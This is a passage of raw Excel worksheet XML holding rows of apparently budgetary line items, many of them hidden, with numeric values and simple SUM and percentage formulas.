      <c r="A988" s="128" t="s">
        <v>1123</v>
      </c>
      <c r="B988" s="100"/>
      <c r="C988" s="100"/>
      <c r="D988" s="100">
        <v>0</v>
      </c>
      <c r="E988" s="173"/>
      <c r="F988" s="174"/>
      <c r="G988" s="172"/>
    </row>
    <row r="989" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A989" s="128" t="s">
        <v>1124</v>
      </c>
      <c r="B989" s="100"/>
      <c r="C989" s="100"/>
      <c r="D989" s="100">
        <v>0</v>
      </c>
      <c r="E989" s="173"/>
      <c r="F989" s="174"/>
      <c r="G989" s="172"/>
    </row>
    <row r="990" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A990" s="128" t="s">
        <v>1125</v>
      </c>
      <c r="B990" s="100">
        <f>SUM(B991:B1005)</f>
        <v>0</v>
      </c>
      <c r="C990" s="100">
        <f>SUM(C991:C1005)</f>
        <v>0</v>
      </c>
      <c r="D990" s="100">
        <f>SUM(D991:D1005)</f>
        <v>0</v>
      </c>
      <c r="E990" s="173">
        <f>SUM(E991:E1005)</f>
        <v>0</v>
      </c>
      <c r="F990" s="174"/>
      <c r="G990" s="172"/>
    </row>
    <row r="991" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A991" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B991" s="100"/>
      <c r="C991" s="100"/>
      <c r="D991" s="100">
        <v>0</v>
      </c>
      <c r="E991" s="173"/>
      <c r="F991" s="174"/>
      <c r="G991" s="172"/>
    </row>
    <row r="992" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A992" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B992" s="100"/>
      <c r="C992" s="100"/>
      <c r="D992" s="100">
        <v>0</v>
      </c>
      <c r="E992" s="173"/>
      <c r="F992" s="174"/>
      <c r="G992" s="172"/>
    </row>
    <row r="993" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A993" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B993" s="100"/>
      <c r="C993" s="100"/>
      <c r="D993" s="100">
        <v>0</v>
      </c>
      <c r="E993" s="173"/>
      <c r="F993" s="174"/>
      <c r="G993" s="172"/>
    </row>
    <row r="994" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A994" s="128" t="s">
        <v>1126</v>
      </c>
      <c r="B994" s="100"/>
      <c r="C994" s="100"/>
      <c r="D994" s="100">
        <v>0</v>
      </c>
      <c r="E994" s="173"/>
      <c r="F994" s="174"/>
      <c r="G994" s="172"/>
    </row>
    <row r="995" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A995" s="128" t="s">
        <v>1127</v>
      </c>
      <c r="B995" s="100"/>
      <c r="C995" s="100"/>
      <c r="D995" s="100">
        <v>0</v>
      </c>
      <c r="E995" s="173"/>
      <c r="F995" s="174"/>
      <c r="G995" s="172"/>
    </row>
    <row r="996" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A996" s="128" t="s">
        <v>1128</v>
      </c>
      <c r="B996" s="100"/>
      <c r="C996" s="100"/>
      <c r="D996" s="100">
        <v>0</v>
      </c>
      <c r="E996" s="173"/>
      <c r="F996" s="174"/>
      <c r="G996" s="172"/>
    </row>
    <row r="997" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A997" s="128" t="s">
        <v>1129</v>
      </c>
      <c r="B997" s="100"/>
      <c r="C997" s="100"/>
      <c r="D997" s="100">
        <v>0</v>
      </c>
      <c r="E997" s="173"/>
      <c r="F997" s="174"/>
      <c r="G997" s="172"/>
    </row>
    <row r="998" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A998" s="128" t="s">
        <v>1130</v>
      </c>
      <c r="B998" s="100"/>
      <c r="C998" s="100"/>
      <c r="D998" s="100">
        <v>0</v>
      </c>
      <c r="E998" s="173"/>
      <c r="F998" s="174"/>
      <c r="G998" s="172"/>
    </row>
    <row r="999" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A999" s="128" t="s">
        <v>1131</v>
      </c>
      <c r="B999" s="100"/>
      <c r="C999" s="100"/>
      <c r="D999" s="100">
        <v>0</v>
      </c>
      <c r="E999" s="173"/>
      <c r="F999" s="174"/>
      <c r="G999" s="172"/>
    </row>
    <row r="1000" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1000" s="128" t="s">
        <v>1132</v>
      </c>
      <c r="B1000" s="100"/>
      <c r="C1000" s="100"/>
      <c r="D1000" s="100">
        <v>0</v>
      </c>
      <c r="E1000" s="173"/>
      <c r="F1000" s="174"/>
      <c r="G1000" s="172"/>
    </row>
    <row r="1001" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1001" s="128" t="s">
        <v>1133</v>
      </c>
      <c r="B1001" s="100"/>
      <c r="C1001" s="100"/>
      <c r="D1001" s="100">
        <v>0</v>
      </c>
      <c r="E1001" s="173"/>
      <c r="F1001" s="174"/>
      <c r="G1001" s="172"/>
    </row>
    <row r="1002" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1002" s="128" t="s">
        <v>1134</v>
      </c>
      <c r="B1002" s="100"/>
      <c r="C1002" s="100"/>
      <c r="D1002" s="100">
        <v>0</v>
      </c>
      <c r="E1002" s="173"/>
      <c r="F1002" s="174"/>
      <c r="G1002" s="172"/>
    </row>
    <row r="1003" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1003" s="128" t="s">
        <v>1135</v>
      </c>
      <c r="B1003" s="100"/>
      <c r="C1003" s="100"/>
      <c r="D1003" s="100">
        <v>0</v>
      </c>
      <c r="E1003" s="173"/>
      <c r="F1003" s="174"/>
      <c r="G1003" s="172"/>
    </row>
    <row r="1004" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1004" s="128" t="s">
        <v>1136</v>
      </c>
      <c r="B1004" s="100"/>
      <c r="C1004" s="100"/>
      <c r="D1004" s="100">
        <v>0</v>
      </c>
      <c r="E1004" s="173"/>
      <c r="F1004" s="174"/>
      <c r="G1004" s="172"/>
    </row>
    <row r="1005" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1005" s="128" t="s">
        <v>1137</v>
      </c>
      <c r="B1005" s="100"/>
      <c r="C1005" s="100"/>
      <c r="D1005" s="100">
        <v>0</v>
      </c>
      <c r="E1005" s="173"/>
      <c r="F1005" s="174"/>
      <c r="G1005" s="172"/>
    </row>
    <row r="1006" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1006" s="128" t="s">
        <v>1138</v>
      </c>
      <c r="B1006" s="100">
        <f>SUM(B1007:B1010)</f>
        <v>0</v>
      </c>
      <c r="C1006" s="100">
        <f>SUM(C1007:C1010)</f>
        <v>0</v>
      </c>
      <c r="D1006" s="100">
        <f>SUM(D1007:D1010)</f>
        <v>0</v>
      </c>
      <c r="E1006" s="173">
        <f>SUM(E1007:E1010)</f>
        <v>0</v>
      </c>
      <c r="F1006" s="174"/>
      <c r="G1006" s="172"/>
    </row>
    <row r="1007" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1007" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1007" s="100"/>
      <c r="C1007" s="100"/>
      <c r="D1007" s="100">
        <v>0</v>
      </c>
      <c r="E1007" s="173"/>
      <c r="F1007" s="174"/>
      <c r="G1007" s="172"/>
    </row>
    <row r="1008" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1008" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1008" s="100"/>
      <c r="C1008" s="100"/>
      <c r="D1008" s="100">
        <v>0</v>
      </c>
      <c r="E1008" s="173"/>
      <c r="F1008" s="174"/>
      <c r="G1008" s="172"/>
    </row>
    <row r="1009" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1009" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1009" s="100"/>
      <c r="C1009" s="100"/>
      <c r="D1009" s="100">
        <v>0</v>
      </c>
      <c r="E1009" s="173"/>
      <c r="F1009" s="174"/>
      <c r="G1009" s="172"/>
    </row>
    <row r="1010" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1010" s="128" t="s">
        <v>1139</v>
      </c>
      <c r="B1010" s="100"/>
      <c r="C1010" s="100"/>
      <c r="D1010" s="100">
        <v>0</v>
      </c>
      <c r="E1010" s="173"/>
      <c r="F1010" s="174"/>
      <c r="G1010" s="172"/>
    </row>
    <row r="1011" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1011" s="128" t="s">
        <v>1140</v>
      </c>
      <c r="B1011" s="100">
        <f>SUM(B1012:B1024)</f>
        <v>0</v>
      </c>
      <c r="C1011" s="100">
        <f>SUM(C1012:C1024)</f>
        <v>0</v>
      </c>
      <c r="D1011" s="100">
        <f>SUM(D1012:D1024)</f>
        <v>0</v>
      </c>
      <c r="E1011" s="173">
        <f>SUM(E1012:E1024)</f>
        <v>0</v>
      </c>
      <c r="F1011" s="174"/>
      <c r="G1011" s="172"/>
    </row>
    <row r="1012" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1012" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1012" s="100"/>
      <c r="C1012" s="100"/>
      <c r="D1012" s="100">
        <v>0</v>
      </c>
      <c r="E1012" s="173"/>
      <c r="F1012" s="174"/>
      <c r="G1012" s="172"/>
    </row>
    <row r="1013" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1013" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1013" s="100"/>
      <c r="C1013" s="100"/>
      <c r="D1013" s="100">
        <v>0</v>
      </c>
      <c r="E1013" s="173"/>
      <c r="F1013" s="174"/>
      <c r="G1013" s="172"/>
    </row>
    <row r="1014" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1014" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1014" s="100"/>
      <c r="C1014" s="100"/>
      <c r="D1014" s="100">
        <v>0</v>
      </c>
      <c r="E1014" s="173"/>
      <c r="F1014" s="174"/>
      <c r="G1014" s="172"/>
    </row>
    <row r="1015" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1015" s="128" t="s">
        <v>1141</v>
      </c>
      <c r="B1015" s="100"/>
      <c r="C1015" s="100"/>
      <c r="D1015" s="100">
        <v>0</v>
      </c>
      <c r="E1015" s="173"/>
      <c r="F1015" s="174"/>
      <c r="G1015" s="172"/>
    </row>
    <row r="1016" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1016" s="128" t="s">
        <v>1142</v>
      </c>
      <c r="B1016" s="100"/>
      <c r="C1016" s="100"/>
      <c r="D1016" s="100">
        <v>0</v>
      </c>
      <c r="E1016" s="173"/>
      <c r="F1016" s="174"/>
      <c r="G1016" s="172"/>
    </row>
    <row r="1017" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1017" s="128" t="s">
        <v>1143</v>
      </c>
      <c r="B1017" s="100"/>
      <c r="C1017" s="100"/>
      <c r="D1017" s="100">
        <v>0</v>
      </c>
      <c r="E1017" s="173"/>
      <c r="F1017" s="174"/>
      <c r="G1017" s="172"/>
    </row>
    <row r="1018" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1018" s="128" t="s">
        <v>1144</v>
      </c>
      <c r="B1018" s="100"/>
      <c r="C1018" s="100"/>
      <c r="D1018" s="100">
        <v>0</v>
      </c>
      <c r="E1018" s="173"/>
      <c r="F1018" s="174"/>
      <c r="G1018" s="172"/>
    </row>
    <row r="1019" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1019" s="128" t="s">
        <v>1145</v>
      </c>
      <c r="B1019" s="100"/>
      <c r="C1019" s="100"/>
      <c r="D1019" s="100">
        <v>0</v>
      </c>
      <c r="E1019" s="173"/>
      <c r="F1019" s="174"/>
      <c r="G1019" s="172"/>
    </row>
    <row r="1020" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1020" s="128" t="s">
        <v>1146</v>
      </c>
      <c r="B1020" s="100"/>
      <c r="C1020" s="100"/>
      <c r="D1020" s="100">
        <v>0</v>
      </c>
      <c r="E1020" s="173"/>
      <c r="F1020" s="174"/>
      <c r="G1020" s="172"/>
    </row>
    <row r="1021" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1021" s="128" t="s">
        <v>1147</v>
      </c>
      <c r="B1021" s="100"/>
      <c r="C1021" s="100"/>
      <c r="D1021" s="100">
        <v>0</v>
      </c>
      <c r="E1021" s="173"/>
      <c r="F1021" s="174"/>
      <c r="G1021" s="172"/>
    </row>
    <row r="1022" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1022" s="128" t="s">
        <v>1092</v>
      </c>
      <c r="B1022" s="100"/>
      <c r="C1022" s="100"/>
      <c r="D1022" s="100">
        <v>0</v>
      </c>
      <c r="E1022" s="173"/>
      <c r="F1022" s="174"/>
      <c r="G1022" s="172"/>
    </row>
    <row r="1023" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1023" s="128" t="s">
        <v>1148</v>
      </c>
      <c r="B1023" s="100"/>
      <c r="C1023" s="100"/>
      <c r="D1023" s="100">
        <v>0</v>
      </c>
      <c r="E1023" s="173"/>
      <c r="F1023" s="174"/>
      <c r="G1023" s="172"/>
    </row>
    <row r="1024" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1024" s="128" t="s">
        <v>1149</v>
      </c>
      <c r="B1024" s="100"/>
      <c r="C1024" s="100"/>
      <c r="D1024" s="100">
        <v>0</v>
      </c>
      <c r="E1024" s="173"/>
      <c r="F1024" s="174"/>
      <c r="G1024" s="172"/>
    </row>
    <row r="1025" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1025" s="128" t="s">
        <v>1150</v>
      </c>
      <c r="B1025" s="100">
        <f>SUM(B1026:B1031)</f>
        <v>0</v>
      </c>
      <c r="C1025" s="100">
        <f>SUM(C1026:C1031)</f>
        <v>0</v>
      </c>
      <c r="D1025" s="100">
        <f>SUM(D1026:D1031)</f>
        <v>0</v>
      </c>
      <c r="E1025" s="173">
        <f>SUM(E1026:E1031)</f>
        <v>0</v>
      </c>
      <c r="F1025" s="174"/>
      <c r="G1025" s="172"/>
    </row>
    <row r="1026" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1026" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1026" s="100"/>
      <c r="C1026" s="100"/>
      <c r="D1026" s="100">
        <v>0</v>
      </c>
      <c r="E1026" s="173"/>
      <c r="F1026" s="174"/>
      <c r="G1026" s="172"/>
    </row>
    <row r="1027" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1027" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1027" s="100"/>
      <c r="C1027" s="100"/>
      <c r="D1027" s="100">
        <v>0</v>
      </c>
      <c r="E1027" s="173"/>
      <c r="F1027" s="174"/>
      <c r="G1027" s="172"/>
    </row>
    <row r="1028" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1028" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1028" s="100"/>
      <c r="C1028" s="100"/>
      <c r="D1028" s="100">
        <v>0</v>
      </c>
      <c r="E1028" s="173"/>
      <c r="F1028" s="174"/>
      <c r="G1028" s="172"/>
    </row>
    <row r="1029" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1029" s="128" t="s">
        <v>1151</v>
      </c>
      <c r="B1029" s="100"/>
      <c r="C1029" s="100"/>
      <c r="D1029" s="100">
        <v>0</v>
      </c>
      <c r="E1029" s="173"/>
      <c r="F1029" s="174"/>
      <c r="G1029" s="172"/>
    </row>
    <row r="1030" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1030" s="128" t="s">
        <v>1152</v>
      </c>
      <c r="B1030" s="100"/>
      <c r="C1030" s="100"/>
      <c r="D1030" s="100">
        <v>0</v>
      </c>
      <c r="E1030" s="173"/>
      <c r="F1030" s="174"/>
      <c r="G1030" s="172"/>
    </row>
    <row r="1031" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1031" s="128" t="s">
        <v>1153</v>
      </c>
      <c r="B1031" s="100"/>
      <c r="C1031" s="100"/>
      <c r="D1031" s="100">
        <v>0</v>
      </c>
      <c r="E1031" s="173"/>
      <c r="F1031" s="174"/>
      <c r="G1031" s="172"/>
    </row>
    <row r="1032" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1032" s="128" t="s">
        <v>1154</v>
      </c>
      <c r="B1032" s="100">
        <f>SUM(B1033:B1038)</f>
        <v>100</v>
      </c>
      <c r="C1032" s="100">
        <f>SUM(C1033:C1038)</f>
        <v>100</v>
      </c>
      <c r="D1032" s="100">
        <f>SUM(D1033:D1038)</f>
        <v>2026</v>
      </c>
      <c r="E1032" s="173">
        <f>SUM(E1033:E1038)</f>
        <v>1100</v>
      </c>
      <c r="F1032" s="174">
        <f>E1032/C1032*100</f>
        <v>1100</v>
      </c>
      <c r="G1032" s="172"/>
    </row>
    <row r="1033" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1033" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1033" s="100">
        <v>0</v>
      </c>
      <c r="C1033" s="100"/>
      <c r="D1033" s="100">
        <v>0</v>
      </c>
      <c r="E1033" s="173"/>
      <c r="F1033" s="174"/>
      <c r="G1033" s="172"/>
    </row>
    <row r="1034" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1034" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1034" s="100">
        <v>0</v>
      </c>
      <c r="C1034" s="100"/>
      <c r="D1034" s="100">
        <v>0</v>
      </c>
      <c r="E1034" s="173"/>
      <c r="F1034" s="174"/>
      <c r="G1034" s="172"/>
    </row>
    <row r="1035" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1035" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1035" s="100">
        <v>0</v>
      </c>
      <c r="C1035" s="100"/>
      <c r="D1035" s="100">
        <v>0</v>
      </c>
      <c r="E1035" s="173"/>
      <c r="F1035" s="174"/>
      <c r="G1035" s="172"/>
    </row>
    <row r="1036" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1036" s="128" t="s">
        <v>1155</v>
      </c>
      <c r="B1036" s="100">
        <v>0</v>
      </c>
      <c r="C1036" s="100"/>
      <c r="D1036" s="100">
        <v>0</v>
      </c>
      <c r="E1036" s="173"/>
      <c r="F1036" s="174"/>
      <c r="G1036" s="172"/>
    </row>
    <row r="1037" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1037" s="128" t="s">
        <v>1156</v>
      </c>
      <c r="B1037" s="100">
        <v>0</v>
      </c>
      <c r="C1037" s="100"/>
      <c r="D1037" s="100">
        <v>926</v>
      </c>
      <c r="E1037" s="173"/>
      <c r="F1037" s="174"/>
      <c r="G1037" s="172"/>
    </row>
    <row r="1038" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1038" s="128" t="s">
        <v>1157</v>
      </c>
      <c r="B1038" s="100">
        <v>100</v>
      </c>
      <c r="C1038" s="100">
        <v>100</v>
      </c>
      <c r="D1038" s="100">
        <v>1100</v>
      </c>
      <c r="E1038" s="173">
        <v>1100</v>
      </c>
      <c r="F1038" s="174">
        <f>E1038/C1038*100</f>
        <v>1100</v>
      </c>
      <c r="G1038" s="172" t="s">
        <v>1158</v>
      </c>
    </row>
    <row r="1039" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1039" s="128" t="s">
        <v>1159</v>
      </c>
      <c r="B1039" s="100">
        <f>SUM(B1040:B1044)</f>
        <v>0</v>
      </c>
      <c r="C1039" s="100">
        <f>SUM(C1040:C1044)</f>
        <v>0</v>
      </c>
      <c r="D1039" s="100">
        <f>SUM(D1040:D1044)</f>
        <v>1400</v>
      </c>
      <c r="E1039" s="173">
        <f>SUM(E1040:E1044)</f>
        <v>0</v>
      </c>
      <c r="F1039" s="174"/>
      <c r="G1039" s="172"/>
    </row>
    <row r="1040" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1040" s="128" t="s">
        <v>1160</v>
      </c>
      <c r="B1040" s="100"/>
      <c r="C1040" s="100"/>
      <c r="D1040" s="100">
        <v>0</v>
      </c>
      <c r="E1040" s="173"/>
      <c r="F1040" s="174"/>
      <c r="G1040" s="172"/>
    </row>
    <row r="1041" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1041" s="128" t="s">
        <v>1161</v>
      </c>
      <c r="B1041" s="100"/>
      <c r="C1041" s="100"/>
      <c r="D1041" s="100">
        <v>1400</v>
      </c>
      <c r="E1041" s="173"/>
      <c r="F1041" s="174"/>
      <c r="G1041" s="172"/>
    </row>
    <row r="1042" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1042" s="128" t="s">
        <v>1162</v>
      </c>
      <c r="B1042" s="100"/>
      <c r="C1042" s="100"/>
      <c r="D1042" s="100">
        <v>0</v>
      </c>
      <c r="E1042" s="173"/>
      <c r="F1042" s="174"/>
      <c r="G1042" s="172"/>
    </row>
    <row r="1043" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1043" s="128" t="s">
        <v>1163</v>
      </c>
      <c r="B1043" s="100"/>
      <c r="C1043" s="100"/>
      <c r="D1043" s="100">
        <v>0</v>
      </c>
      <c r="E1043" s="173"/>
      <c r="F1043" s="174"/>
      <c r="G1043" s="172"/>
    </row>
    <row r="1044" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1044" s="128" t="s">
        <v>1164</v>
      </c>
      <c r="B1044" s="100"/>
      <c r="C1044" s="100"/>
      <c r="D1044" s="100">
        <v>0</v>
      </c>
      <c r="E1044" s="173"/>
      <c r="F1044" s="174"/>
      <c r="G1044" s="172"/>
    </row>
    <row r="1045" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1045" s="128" t="s">
        <v>1165</v>
      </c>
      <c r="B1045" s="173">
        <f>SUM(B1046,B1056,B1062)</f>
        <v>1357</v>
      </c>
      <c r="C1045" s="173">
        <f>SUM(C1046,C1056,C1062)</f>
        <v>449</v>
      </c>
      <c r="D1045" s="173">
        <f>SUM(D1046,D1056,D1062)</f>
        <v>708</v>
      </c>
      <c r="E1045" s="173">
        <f>SUM(E1046,E1056,E1062)</f>
        <v>299</v>
      </c>
      <c r="F1045" s="174">
        <f aca="true" t="shared" si="61" ref="F1045:F1048">E1045/C1045*100</f>
        <v>66.59242761692651</v>
      </c>
      <c r="G1045" s="172"/>
    </row>
    <row r="1046" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1046" s="128" t="s">
        <v>1166</v>
      </c>
      <c r="B1046" s="100">
        <f>SUM(B1047:B1055)</f>
        <v>569</v>
      </c>
      <c r="C1046" s="100">
        <f>SUM(C1047:C1055)</f>
        <v>269</v>
      </c>
      <c r="D1046" s="100">
        <f>SUM(D1047:D1055)</f>
        <v>479</v>
      </c>
      <c r="E1046" s="173">
        <f>SUM(E1047:E1055)</f>
        <v>299</v>
      </c>
      <c r="F1046" s="174">
        <f t="shared" si="61"/>
        <v>111.15241635687731</v>
      </c>
      <c r="G1046" s="172"/>
    </row>
    <row r="1047" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1047" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1047" s="100">
        <v>219</v>
      </c>
      <c r="C1047" s="100">
        <v>219</v>
      </c>
      <c r="D1047" s="100">
        <v>199</v>
      </c>
      <c r="E1047" s="173">
        <v>199</v>
      </c>
      <c r="F1047" s="174">
        <f t="shared" si="61"/>
        <v>90.8675799086758</v>
      </c>
      <c r="G1047" s="172"/>
    </row>
    <row r="1048" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1048" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1048" s="100">
        <v>50</v>
      </c>
      <c r="C1048" s="100">
        <v>50</v>
      </c>
      <c r="D1048" s="100">
        <v>0</v>
      </c>
      <c r="E1048" s="173"/>
      <c r="F1048" s="174">
        <f t="shared" si="61"/>
        <v>0</v>
      </c>
      <c r="G1048" s="172"/>
    </row>
    <row r="1049" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1049" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1049" s="100">
        <v>0</v>
      </c>
      <c r="C1049" s="100"/>
      <c r="D1049" s="100">
        <v>0</v>
      </c>
      <c r="E1049" s="173"/>
      <c r="F1049" s="174"/>
      <c r="G1049" s="172"/>
    </row>
    <row r="1050" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1050" s="128" t="s">
        <v>1167</v>
      </c>
      <c r="B1050" s="100">
        <v>0</v>
      </c>
      <c r="C1050" s="100"/>
      <c r="D1050" s="100">
        <v>0</v>
      </c>
      <c r="E1050" s="173"/>
      <c r="F1050" s="174"/>
      <c r="G1050" s="172"/>
    </row>
    <row r="1051" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1051" s="128" t="s">
        <v>1168</v>
      </c>
      <c r="B1051" s="100">
        <v>0</v>
      </c>
      <c r="C1051" s="100"/>
      <c r="D1051" s="100">
        <v>0</v>
      </c>
      <c r="E1051" s="173"/>
      <c r="F1051" s="174"/>
      <c r="G1051" s="172"/>
    </row>
    <row r="1052" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1052" s="128" t="s">
        <v>1169</v>
      </c>
      <c r="B1052" s="100">
        <v>0</v>
      </c>
      <c r="C1052" s="100"/>
      <c r="D1052" s="100">
        <v>0</v>
      </c>
      <c r="E1052" s="173"/>
      <c r="F1052" s="174"/>
      <c r="G1052" s="172"/>
    </row>
    <row r="1053" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1053" s="128" t="s">
        <v>1170</v>
      </c>
      <c r="B1053" s="100">
        <v>0</v>
      </c>
      <c r="C1053" s="100"/>
      <c r="D1053" s="100">
        <v>0</v>
      </c>
      <c r="E1053" s="173"/>
      <c r="F1053" s="174"/>
      <c r="G1053" s="172"/>
    </row>
    <row r="1054" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1054" s="128" t="s">
        <v>381</v>
      </c>
      <c r="B1054" s="100">
        <v>0</v>
      </c>
      <c r="C1054" s="100"/>
      <c r="D1054" s="100">
        <v>0</v>
      </c>
      <c r="E1054" s="173"/>
      <c r="F1054" s="174"/>
      <c r="G1054" s="172"/>
    </row>
    <row r="1055" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1055" s="128" t="s">
        <v>1171</v>
      </c>
      <c r="B1055" s="100">
        <v>300</v>
      </c>
      <c r="C1055" s="100"/>
      <c r="D1055" s="100">
        <v>280</v>
      </c>
      <c r="E1055" s="173">
        <v>100</v>
      </c>
      <c r="F1055" s="174"/>
      <c r="G1055" s="172"/>
    </row>
    <row r="1056" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1056" s="128" t="s">
        <v>1172</v>
      </c>
      <c r="B1056" s="100">
        <f>SUM(B1057:B1061)</f>
        <v>788</v>
      </c>
      <c r="C1056" s="100">
        <f>SUM(C1057:C1061)</f>
        <v>180</v>
      </c>
      <c r="D1056" s="100">
        <f>SUM(D1057:D1061)</f>
        <v>229</v>
      </c>
      <c r="E1056" s="173">
        <f>SUM(E1057:E1061)</f>
        <v>0</v>
      </c>
      <c r="F1056" s="174">
        <f>E1056/C1056*100</f>
        <v>0</v>
      </c>
      <c r="G1056" s="172"/>
    </row>
    <row r="1057" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1057" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B1057" s="100">
        <v>0</v>
      </c>
      <c r="C1057" s="100"/>
      <c r="D1057" s="100">
        <v>0</v>
      </c>
      <c r="E1057" s="173"/>
      <c r="F1057" s="174"/>
      <c r="G1057" s="172"/>
    </row>
    <row r="1058" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1058" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B1058" s="100">
        <v>0</v>
      </c>
      <c r="C1058" s="100"/>
      <c r="D1058" s="100">
        <v>0</v>
      </c>
      <c r="E1058" s="173"/>
      <c r="F1058" s="174"/>
      <c r="G1058" s="172"/>
    </row>
    <row r="1059" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1059" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B1059" s="100">
        <v>0</v>
      </c>
      <c r="C1059" s="100"/>
      <c r="D1059" s="100">
        <v>0</v>
      </c>
      <c r="E1059" s="173"/>
      <c r="F1059" s="174"/>
      <c r="G1059" s="172"/>
    </row>
    <row r="1060" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1060" s="128" t="s">
        <v>1173</v>
      </c>
      <c r="B1060" s="100">
        <v>0</v>
      </c>
      <c r="C1060" s="100"/>
      <c r="D1060" s="100">
        <v>0</v>
      </c>
      <c r="E1060" s="173"/>
      <c r="F1060" s="174"/>
      <c r="G1060" s="172"/>
    </row>
    <row r="1061" spans="1:7" ht="17.25" customHeight="1">
      <c r="A1061" s="128" t="s">
        <v>1174</v>
      </c>
      <c r="B1061" s="100">
        <v>788</v>
      </c>
      <c r="C1061" s="100">
        <v>180</v>
      </c>
      <c r="D1061" s="100">
        <v>229</v>
      </c>
      <c r="E1061" s="173"/>
      <c r="F1061" s="174">
        <f>E1061/C1061*100</f>
        <v>0</v>
      </c>
      <c r="G1061" s="172"/>
    </row>
    <row r="1062" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A1062" s="128" t="s">
        <v>1175</v>
      </c>
      <c r="B1062" s="100">
        <f>SUM(B1063:B1064)</f>
        <v>0</v>
      </c>
      <c r="C1062" s="100">
        <f>SUM(C1063:C1064)</f>
        <v>0</v>
